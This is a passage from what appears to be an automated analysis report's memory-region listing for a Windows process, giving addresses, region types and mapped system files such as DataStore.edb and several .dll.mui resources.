end_va = 0xb42f0f0fff entry_point = 0x0 region_type = private name = "private_0x000000b42f0f0000" filename = "" Region: id = 972 start_va = 0xb42f100000 end_va = 0xb42f1fffff entry_point = 0x0 region_type = private name = "private_0x000000b42f100000" filename = "" Region: id = 973 start_va = 0xb42f200000 end_va = 0xb42f2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b42f200000" filename = "" Region: id = 974 start_va = 0xb42f2c0000 end_va = 0xb42f2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b42f2c0000" filename = "" Region: id = 975 start_va = 0xb42f2d0000 end_va = 0xb42f2d6fff entry_point = 0x0 region_type = private name = "private_0x000000b42f2d0000" filename = "" Region: id = 976 start_va = 0xb42f2e0000 end_va = 0xb42f2e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b42f2e0000" filename = "" Region: id = 977 start_va = 0xb42f2f0000 end_va = 0xb42f2f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b42f2f0000" filename = "" Region: id = 978 start_va = 0xb42f300000 end_va = 0xb42f3fffff entry_point = 0x0 region_type = private name = "private_0x000000b42f300000" filename = "" Region: id = 979 start_va = 0xb42f400000 end_va = 0xb42f587fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b42f400000" filename = "" Region: id = 980 start_va = 0xb42f590000 end_va = 0xb42f710fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b42f590000" filename = "" Region: id = 981 start_va = 0xb42f720000 end_va = 0xb42f79ffff entry_point = 0x0 region_type = private name = "private_0x000000b42f720000" filename = "" Region: id = 982 start_va = 0xb42f7a0000 end_va = 0xb42f81ffff entry_point = 0x0 region_type = private name = "private_0x000000b42f7a0000" filename = "" Region: id = 983 start_va = 0xb42f820000 end_va = 0xb42f820fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b42f820000" filename = "" Region: id = 984 start_va = 0xb42f830000 end_va = 0xb42f83cfff entry_point = 0xb42f830000 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 985 start_va = 0xb42f840000 end_va = 0xb42f843fff entry_point = 0xb42f840000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 986 start_va = 0xb42f850000 end_va = 0xb42f85cfff entry_point = 0xb42f850000 region_type = mapped_file name = "gpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui") Region: id = 987 start_va = 0xb42f860000 end_va = 0xb42f863fff entry_point = 0xb42f860000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 988 start_va = 0xb42f870000 end_va = 0xb42f880fff entry_point = 0xb42f870000 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 989 start_va = 0xb42f890000 end_va = 0xb42f896fff entry_point = 0x0 region_type = private name = "private_0x000000b42f890000" filename = "" Region: id = 990 start_va = 0xb42f8a0000 end_va = 0xb42f8a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b42f8a0000" filename = "" Region: id = 991 start_va = 0xb42f8b0000 end_va = 0xb42f8b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b42f8b0000" filename = "" Region: id = 992 start_va = 0xb42f8c0000 end_va = 0xb42f8c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b42f8c0000" filename = "" Region: id = 993 start_va = 0xb42f8d0000 end_va = 0xb42f8d6fff entry_point = 0x0 region_type = private name = "private_0x000000b42f8d0000" filename = "" Region: id = 994 start_va = 0xb42f8e0000 end_va = 0xb42f8e1fff entry_point = 0xb42f8e0000 region_type = mapped_file name = "activeds.dll.mui" filename = "\\Windows\\System32\\en-US\\activeds.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\activeds.dll.mui") Region: id = 995 start_va = 0xb42f8f0000 end_va = 0xb42f8f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b42f8f0000" filename = "" Region: id = 996 start_va = 0xb42f900000 end_va = 0xb42f9fffff entry_point = 0x0 region_type = private name = "private_0x000000b42f900000" filename = "" Region: id = 997 start_va = 0xb42fa00000 end_va = 0xb42fafffff entry_point = 0x0 region_type = private name = "private_0x000000b42fa00000" filename = "" Region: id = 998 start_va = 0xb42fb00000 end_va = 0xb42fbfffff entry_point = 0x0 region_type = private name = "private_0x000000b42fb00000" filename = "" Region: id = 999 start_va = 0xb42fc00000 end_va = 0xb42ff36fff entry_point = 0xb42fc00000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1000 start_va = 0xb42ff40000 end_va = 0xb43003ffff entry_point = 0x0 region_type = private name = "private_0x000000b42ff40000" filename = "" Region: id = 1001 start_va = 0xb430040000 end_va = 0xb43013ffff entry_point = 0x0 region_type = private name = "private_0x000000b430040000" filename = "" Region: id = 1002 start_va = 0xb430140000 end_va = 0xb43023ffff entry_point = 0x0 region_type = private name = "private_0x000000b430140000" filename = "" Region: id = 1003 start_va = 0xb430240000 end_va = 0xb43033ffff entry_point = 0x0 region_type = private name = "private_0x000000b430240000" filename = "" Region: id = 1004 start_va = 0xb430340000 end_va = 0xb4303bffff entry_point = 0x0 region_type = private name = "private_0x000000b430340000" filename = "" Region: id = 1005 start_va = 0xb4303c0000 end_va = 0xb4303c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b4303c0000" filename = "" Region: id = 1006 start_va = 0xb4303d0000 end_va = 0xb4303d8fff entry_point = 0xb4303d0000 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 1007 start_va = 0xb4303e0000 end_va = 0xb4303e4fff entry_point = 0xb4303e0000 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 1008 start_va = 0xb4303f0000 end_va = 0xb4303fffff entry_point = 0xb4303f0000 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 1009 start_va = 0xb430400000 end_va = 0xb4304fffff entry_point = 0x0 region_type = private name = "private_0x000000b430400000" filename = "" Region: id = 1010 start_va = 0xb430500000 end_va = 0xb4305fffff entry_point = 0x0 region_type = private name = "private_0x000000b430500000" filename = "" Region: id = 1011 start_va = 0xb430600000 end_va = 0xb43068afff entry_point = 0xb430600000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 1012 start_va = 0xb430690000 end_va = 0xb430692fff entry_point = 0xb430690000 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 1013 start_va = 0xb4306a0000 end_va = 0xb4306b7fff entry_point = 0x0 region_type = private name = "private_0x000000b4306a0000" filename = "" Region: id = 1014 start_va = 0xb4306c0000 end_va = 0xb4306c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b4306c0000" filename = "" Region: id = 1015 start_va = 0xb4306d0000 end_va = 0xb4306d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b4306d0000" filename = "" Region: id = 1016 start_va = 0xb4306e0000 end_va = 0xb4306e6fff entry_point = 0xb4306e0000 region_type = mapped_file name = "newdev.dll.mui" filename = "\\Windows\\System32\\en-US\\newdev.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\newdev.dll.mui") Region: id = 1017 start_va = 0xb4306f0000 end_va = 0xb4306fffff entry_point = 0xb4306f0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1018 start_va = 0xb430700000 end_va = 0xb4307fffff entry_point = 0x0 region_type = private name = "private_0x000000b430700000" filename = "" Region: id = 1019 start_va = 0xb430800000 end_va = 0xb4308fffff entry_point = 0x0 region_type = private name = "private_0x000000b430800000" filename = "" Region: id = 1020 start_va = 0xb430900000 end_va = 0xb43097ffff entry_point = 0x0 region_type = private name = "private_0x000000b430900000" filename = "" Region: id = 1021 start_va = 0xb430980000 end_va = 0xb4309c2fff entry_point = 0xb430980000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000013.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000013.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000013.db") Region: id = 1022 start_va = 0xb4309d0000 end_va = 0xb4309d0fff entry_point = 0xb4309d0000 region_type = mapped_file name = "dosvc.dll.mui" filename = "\\Windows\\System32\\en-US\\dosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dosvc.dll.mui") Region: id = 1023 start_va = 0xb4309e0000 end_va = 0xb4309e0fff entry_point = 0xb4309e0000 region_type = mapped_file name = "usocore.dll.mui" filename = "\\Windows\\System32\\en-US\\usocore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\usocore.dll.mui") Region: id = 1024 start_va = 0xb4309f0000 end_va = 0xb430a30fff entry_point = 0x0 region_type = private name = "private_0x000000b4309f0000" filename = "" Region: id = 1025 start_va = 0xb430a40000 end_va = 0xb430a40fff entry_point = 0x0 region_type = private name = "private_0x000000b430a40000" filename = "" Region: id = 1026 start_va = 0xb430a50000 end_va = 0xb430a50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b430a50000" filename = "" Region: id = 1027 start_va = 0xb430a60000 end_va = 0xb430a67fff entry_point = 0x0 region_type = private name = "private_0x000000b430a60000" filename = "" Region: id = 1028 start_va = 0xb430a70000 end_va = 0xb430a7ffff entry_point = 0x0 region_type = private name = "private_0x000000b430a70000" filename = "" Region: id = 1029 start_va = 0xb430a80000 end_va = 0xb430b7ffff entry_point = 0x0 region_type = private name = "private_0x000000b430a80000" filename = "" Region: id = 1030 start_va = 0xb430b80000 end_va = 0xb430c7ffff entry_point = 0x0 region_type = private name = "private_0x000000b430b80000" filename = "" Region: id = 1031 start_va = 0xb430c80000 end_va = 0xb430cfffff entry_point = 0x0 region_type = private name = "private_0x000000b430c80000" filename = "" Region: id = 1032 start_va = 0xb430d00000 end_va = 0xb430dfffff entry_point = 0x0 region_type = private name = "private_0x000000b430d00000" filename = "" Region: id = 1033 start_va = 0xb430e00000 end_va = 0xb430efffff entry_point = 0x0 region_type = private name = "private_0x000000b430e00000" filename = "" Region: id = 1034 start_va = 0xb430f00000 end_va = 0xb430ffffff entry_point = 0x0 region_type = private name = "private_0x000000b430f00000" filename = "" Region: id = 1035 start_va = 0xb431000000 end_va = 0xb4310fffff entry_point = 0x0 region_type = private name = "private_0x000000b431000000" filename = "" Region: id = 1036 start_va = 0xb431180000 end_va = 0xb4311fffff entry_point = 0x0 region_type = private name = "private_0x000000b431180000" filename = "" Region: id = 1037 start_va = 0xb431200000 end_va = 0xb4312fffff entry_point = 0x0 region_type = private name = "private_0x000000b431200000" filename = "" Region: id = 1038 start_va = 0xb431380000 end_va = 0xb43147ffff entry_point = 0x0 region_type = private name = "private_0x000000b431380000" filename = "" Region: id = 1039 start_va = 0xb431500000 end_va = 0xb4315defff entry_point = 0xb431500000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1040 start_va = 0xb4315e0000 end_va = 0xb4315effff entry_point = 0x0 region_type = private name = "private_0x000000b4315e0000" filename = "" Region: id = 1041 start_va = 0xb4315f0000 end_va = 0xb4315f0fff entry_point = 0x0 region_type = private name = "private_0x000000b4315f0000" filename = "" Region: id = 1042 start_va = 0xb431600000 end_va = 0xb4316fffff entry_point = 0x0 region_type = private name = "private_0x000000b431600000" filename = "" Region: id = 1043 start_va = 0xb431700000 end_va = 0xb43177ffff entry_point = 0x0 region_type = private name = "private_0x000000b431700000" filename = "" Region: id = 1044 start_va = 0xb431780000 end_va = 0xb43187ffff entry_point = 0x0 region_type = private name = "private_0x000000b431780000" filename = "" Region: id = 1045 start_va = 0xb431880000 end_va = 0xb43197ffff entry_point = 0x0 region_type = private name = "private_0x000000b431880000" filename = "" Region: id = 1046 start_va = 0xb431980000 end_va = 0xb431980fff entry_point = 0x0 region_type = private name = "private_0x000000b431980000" filename = "" Region: id = 1047 start_va = 0xb431990000 end_va = 0xb431a8ffff entry_point = 0x0 region_type = private name = "private_0x000000b431990000" filename = "" Region: id = 1048 start_va = 0xb431a90000 end_va = 0xb431a9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b431a90000" filename = "" Region: id = 1049 start_va = 0xb431aa0000 end_va = 0xb431aaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b431aa0000" filename = "" Region: id = 1050 start_va = 0xb431ab0000 end_va = 0xb431abffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b431ab0000" filename = "" Region: id = 1051 start_va = 0xb431ac0000 end_va = 0xb431acffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b431ac0000" filename = "" Region: id = 1052 start_va = 0xb431ad0000 end_va = 0xb431adffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b431ad0000" filename = "" Region: id = 1053 start_va = 0xb431ae0000 end_va = 0xb431aeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b431ae0000" filename = "" Region: id = 1054 start_va = 0xb431af0000 end_va = 0xb431af3fff entry_point = 0x0 region_type = private name = "private_0x000000b431af0000" filename = "" Region: id = 1055 start_va = 0xb431b00000 end_va = 0xb431b06fff entry_point = 0x0 region_type = private name = "private_0x000000b431b00000" filename = "" Region: id = 1056 start_va = 0xb431b10000 end_va = 0xb431c0ffff entry_point = 0x0 region_type = private name = "private_0x000000b431b10000" filename = "" Region: id = 1057 start_va = 0xb431c90000 end_va = 0xb431d8ffff entry_point = 0x0 region_type = private name = "private_0x000000b431c90000" filename = "" Region: id = 1058 start_va = 0xb431d90000 end_va = 0xb431e0ffff entry_point = 0x0 region_type = private name = "private_0x000000b431d90000" filename = "" Region: id = 1059 start_va = 0xb431e10000 end_va = 0xb431f0ffff entry_point = 0x0 region_type = private name = "private_0x000000b431e10000" filename = "" Region: id = 1060 start_va = 0xb431f10000 end_va = 0xb431f8ffff entry_point = 0x0 region_type = private name = "private_0x000000b431f10000" filename = "" Region: id = 1061 start_va = 0xb431f90000 end_va = 0xb43200ffff entry_point = 0x0 region_type = private name = "private_0x000000b431f90000" filename = "" Region: id = 1062 start_va = 0xb432010000 end_va = 0xb43208ffff entry_point = 0x0 region_type = private name = "private_0x000000b432010000" filename = "" Region: id = 1063 start_va = 0xb432090000 end_va = 0xb43210ffff entry_point = 0x0 region_type = private name = "private_0x000000b432090000" filename = "" Region: id = 1064 start_va = 0xb432110000 end_va = 0xb43220ffff entry_point = 0x0 region_type = private name = "private_0x000000b432110000" filename = "" Region: id = 1065 start_va = 0xb432210000 end_va = 0xb43230ffff entry_point = 0x0 region_type = private name = "private_0x000000b432210000" filename = "" Region: id = 1066 start_va = 0xb432310000 end_va = 0xb43240ffff entry_point = 0x0 region_type = private name = "private_0x000000b432310000" filename = "" Region: id = 1067 start_va = 0xb432410000 end_va = 0xb43248ffff entry_point = 0x0 region_type = private name = "private_0x000000b432410000" filename = "" Region: id = 1068 start_va = 0xb432490000 end_va = 0xb43258ffff entry_point = 0x0 region_type = private name = "private_0x000000b432490000" filename = "" Region: id = 1069 start_va = 0xb432590000 end_va = 0xb43268ffff entry_point = 0x0 region_type = private name = "private_0x000000b432590000" filename = "" Region: id = 1070 start_va = 0xb432690000 end_va = 0xb43278ffff entry_point = 0x0 region_type = private name = "private_0x000000b432690000" filename = "" Region: id = 1071 start_va = 0xb432790000 end_va = 0xb43288ffff entry_point = 0x0 region_type = private name = "private_0x000000b432790000" filename = "" Region: id = 1072 start_va = 0xb432890000 end_va = 0xb43290ffff entry_point = 0x0 region_type = private name = "private_0x000000b432890000" filename = "" Region: id = 1073 start_va = 0xb432910000 end_va = 0xb43295cfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b432910000" filename = "" Region: id = 1074 start_va = 0xb432960000 end_va = 0xb432961fff entry_point = 0x0 region_type = private name = "private_0x000000b432960000" filename = "" Region: id = 1075 start_va = 0xb432970000 end_va = 0xb432976fff entry_point = 0x0 region_type = private name = "private_0x000000b432970000" filename = "" Region: id = 1076 start_va = 0xb432980000 end_va = 0xb432a7ffff entry_point = 0x0 region_type = private name = "private_0x000000b432980000" filename = "" Region: id = 1077 start_va = 0xb432a80000 end_va = 0xb432afffff entry_point = 0x0 region_type = private name = "private_0x000000b432a80000" filename = "" Region: id = 1078 start_va = 0xb432b00000 end_va = 0xb432bfffff entry_point = 0x0 region_type = private name = "private_0x000000b432b00000" filename = "" Region: id = 1079 start_va = 0xb432c00000 end_va = 0xb432cfffff entry_point = 0x0 region_type = private name = "private_0x000000b432c00000" filename = "" Region: id = 1080 start_va = 0xb432d00000 end_va = 0xb432dfffff entry_point = 0x0 region_type = private name = "private_0x000000b432d00000" filename = "" Region: id = 1081 start_va = 0xb432e00000 end_va = 0xb432e0ffff entry_point = 0xb432e00000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1082 start_va = 0xb432e10000 end_va = 0xb432e1ffff entry_point = 0xb432e10000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1083 start_va = 0xb432e20000 end_va = 0xb432e2ffff entry_point = 0xb432e20000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1084 start_va = 0xb432e30000 end_va = 0xb432e3ffff entry_point = 0xb432e30000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1085 start_va = 0xb432e40000 end_va = 0xb432e4ffff entry_point = 0xb432e40000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1086 start_va = 0xb432e50000 end_va = 0xb432e5ffff entry_point = 0xb432e50000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1087 start_va = 0xb432e60000 end_va = 0xb432e6ffff entry_point = 0xb432e60000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1088 start_va = 0xb432e70000 end_va = 0xb432e7ffff entry_point = 0xb432e70000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1089 start_va = 0xb432e80000 end_va = 0xb432e8ffff entry_point = 0xb432e80000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1090 start_va = 0xb432e90000 end_va = 0xb432e9ffff entry_point = 0xb432e90000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1091 start_va = 0xb432ea0000 end_va = 0xb432eaffff entry_point = 0xb432ea0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1092 start_va = 0xb432eb0000 end_va = 0xb432ebffff entry_point = 0xb432eb0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1093 start_va = 0xb432ec0000 end_va = 0xb432ecffff entry_point = 0xb432ec0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1094 start_va = 0xb432ed0000 end_va = 0xb432edffff entry_point = 0xb432ed0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1095 start_va = 0xb432ee0000 end_va = 0xb432eeffff entry_point = 0xb432ee0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1096 start_va = 0xb432ef0000 end_va = 0xb432efffff entry_point = 0xb432ef0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1097 start_va = 0xb432f00000 end_va = 0xb432ffffff entry_point = 0x0 region_type = private name = "private_0x000000b432f00000" filename = "" Region: id = 1098 start_va = 0xb433000000 end_va = 0xb4330fffff entry_point = 0x0 region_type = private name = "private_0x000000b433000000" filename = "" Region: id = 1099 start_va = 0xb433100000 end_va = 0xb4331fffff entry_point = 0x0 region_type = private name = "private_0x000000b433100000" filename = "" Region: id = 1100 start_va = 0xb433200000 end_va = 0xb4332fffff entry_point = 0x0 region_type = private name = "private_0x000000b433200000" filename = "" Region: id = 1101 start_va = 0xb433300000 end_va = 0xb4333fffff entry_point = 0x0 region_type = private name = "private_0x000000b433300000" filename = "" Region: id = 1102 start_va = 0xb433400000 end_va = 0xb4334fffff entry_point = 0x0 region_type = private name = "private_0x000000b433400000" filename = "" Region: id = 1103 start_va = 0xb433500000 end_va = 0xb4335fffff entry_point = 0x0 region_type = private name = "private_0x000000b433500000" filename = "" Region: id = 1104 start_va = 0xb433600000 end_va = 0xb4336fffff entry_point = 0x0 region_type = private name = "private_0x000000b433600000" filename = "" Region: id = 1105 start_va = 0xb433700000 end_va = 0xb4337fffff entry_point = 0x0 region_type = private name = "private_0x000000b433700000" filename = "" Region: id = 1106 start_va = 0xb433800000 end_va = 0xb43384cfff entry_point = 0x0 region_type = private name = "private_0x000000b433800000" filename = "" Region: id = 1107 start_va = 0xb433850000 end_va = 0xb433850fff entry_point = 0x0 region_type = private name = "private_0x000000b433850000" filename = "" Region: id = 1108 start_va = 0xb433860000 end_va = 0xb433866fff entry_point = 0x0 region_type = private name = "private_0x000000b433860000" filename = "" Region: id = 1109 start_va = 0xb433870000 end_va = 0xb4338effff entry_point = 0x0 region_type = private name = "private_0x000000b433870000" filename = "" Region: id = 1110 start_va = 0xb4338f0000 end_va = 0xb4338f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b4338f0000" filename = "" Region: id = 1111 start_va = 0xb433900000 end_va = 0xb4339fffff entry_point = 0x0 region_type = private name = "private_0x000000b433900000" filename = "" Region: id = 1112 start_va = 0xb433a00000 end_va = 0xb433afffff entry_point = 0x0 region_type = private name = "private_0x000000b433a00000" filename = "" Region: id = 1113 start_va = 0xb433b00000 end_va = 0xb433bfffff entry_point = 0x0 region_type = private name = "private_0x000000b433b00000" filename = "" Region: id = 1114 start_va = 0xb433c00000 end_va = 0xb433cfffff entry_point = 0x0 region_type = private name = "private_0x000000b433c00000" filename = "" Region: id = 1115 start_va = 0xb433d00000 end_va = 0xb433d7ffff entry_point = 0x0 region_type = private name = "private_0x000000b433d00000" filename = "" Region: id = 1116 start_va = 0xb433d80000 end_va = 0xb433dfffff entry_point = 0x0 region_type = private name = "private_0x000000b433d80000" filename = "" Region: id = 1117 start_va = 0xb433e00000 end_va = 0xb433efffff entry_point = 0x0 region_type = private name = "private_0x000000b433e00000" filename = "" Region: id = 1118 start_va = 0xb433f00000 end_va = 0xb433f7ffff entry_point = 0x0 region_type = private name = "private_0x000000b433f00000" filename = "" Region: id = 1119 start_va = 0xb433f80000 end_va = 0xb433f8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b433f80000" filename = "" Region: id = 1120 start_va = 0xb433f90000 end_va = 0xb433f9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b433f90000" filename = "" Region: id = 1121 start_va = 0xb433fa0000 end_va = 0xb433faffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b433fa0000" filename = "" Region: id = 1122 start_va = 0xb433fb0000 end_va = 0xb433fbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b433fb0000" filename = "" Region: id = 1123 start_va = 0xb433fc0000 end_va = 0xb433fcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b433fc0000" filename = "" Region: id = 1124 start_va = 0xb433fd0000 end_va = 0xb433fdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b433fd0000" filename = "" Region: id = 1125 start_va = 0xb433fe0000 end_va = 0xb433fe6fff entry_point = 0x0 region_type = private name = "private_0x000000b433fe0000" filename = "" Region: id = 1126 start_va = 0xb433ff0000 end_va = 0xb433ffffff entry_point = 0x0 region_type = private name = "private_0x000000b433ff0000" filename = "" Region: id = 1127 start_va = 0xb434000000 end_va = 0xb43402ffff entry_point = 0x0 region_type = private name = "private_0x000000b434000000" filename = "" Region: id = 1128 start_va = 0xb434030000 end_va = 0xb434037fff entry_point = 0x0 region_type = private name = "private_0x000000b434030000" filename = "" Region: id = 1129 start_va = 0xb434040000 end_va = 0xb43404ffff entry_point = 0xb434040000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1130 start_va = 0xb434050000 end_va = 0xb43405ffff entry_point = 0xb434050000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1131 start_va = 0xb434060000 end_va = 0xb43406ffff entry_point = 0xb434060000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1132 start_va = 0xb434070000 end_va = 0xb43407ffff entry_point = 0xb434070000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1133 start_va = 0xb434080000 end_va = 0xb43408ffff entry_point = 0xb434080000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1134 start_va = 0xb434090000 end_va = 0xb43409ffff entry_point = 0xb434090000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1135 start_va = 0xb4340a0000 end_va = 0xb4340a6fff entry_point = 0x0 region_type = private name = "private_0x000000b4340a0000" filename = "" Region: id = 1136 start_va = 0xb4340b0000 end_va = 0xb4341affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b4340b0000" filename = "" Region: id = 1137 start_va = 0xb4341b0000 end_va = 0xb4342affff entry_point = 0x0 region_type = private name = "private_0x000000b4341b0000" filename = "" Region: id = 1138 start_va = 0xb4342b0000 end_va = 0xb4343affff entry_point = 0x0 region_type = private name = "private_0x000000b4342b0000" filename = "" Region: id = 